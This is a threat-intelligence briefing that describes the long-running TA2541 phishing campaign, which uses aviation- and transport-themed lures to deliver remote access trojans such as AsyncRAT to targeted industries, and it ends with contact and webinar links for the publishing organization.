An unknown criminal hacking group is targeting organizations in the aviation, aerospace, defense, transportation and manufacturing industries with trojan malware, in attacks that researchers say have been going on for years. The malware has been named TA2541 and detailed by cybersecurity researchers the persistent cyber-criminal operation has been active since 2017 and has compromised hundreds of organizations across North America, Europe, and the Middle East.
Despite operating for nearly 5 years, the attacks have barely evolved following the same targeting and themes in which attackers remotely control compromised machines, conduct reconnaissance on networks and steal sensitive data.
"What's noteworthy about TA2541 is how little they've changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans," said the current vice president of threat research and Detection at Proofpoint.[1] "This group is a persistent threat to targets throughout the transportation, logistics, and travel industries."
Attacks begin with phishing emails designed to be relevant to individuals and businesses in the sectors being targeted. One lure email sent to targets in aviation and aerospace resembles requests for aircraft parts, while another is designed to look like an urgent request for air ambulance flight details. At one point, the attackers introduced COVID-19-themed lures, although these were soon dropped. While the lures are not very customized and follow regular templates, the sheer number of messages sent over the years, estimated to be in the hundreds of thousands in total and their implied urgency will be enough to fool victims into downloading malware. The messages are nearly always in English.[2]
TA2541 initially sent emails containing macro-laden Microsoft Word attachments that downloaded the Remote Access Trojan (RAT) payload, but the group has recently shifted to using Google Drive and Microsoft OneDrive URLs, which lead to an obfuscated Visual Basic Script (VBS) file. Interacting with these files the names of which follow similar themes to the initial lures will leverage PowerShell functions to download malware onto compromised Windows machines.
The cyber criminals have distributed over a dozen different trojan malware payloads since the campaigns began, all of which are available to buy on dark web forums or can be downloaded from open-source repositories. Currently, the most commonly delivered malware in TA2541 campaigns is AsyncRAT, but other popular payloads include NetWire, WSH RAT and Parallax.
No matter which malware is delivered, it is used to gain remote control of infected machines and steal data, although researchers note that they still do not know what the ultimate goal of the group is, or from where they are operating. The campaign is still active around the world.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization who has long collected and analyzed cyber indicators. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.wapacklabs.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989
[1] https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight
[2] https://www.zdnet.com/article/these-prolific-hackers-have-been-targeting-the-aerospace-and-defence-industries-with-trojan-malware-for-years/
Comments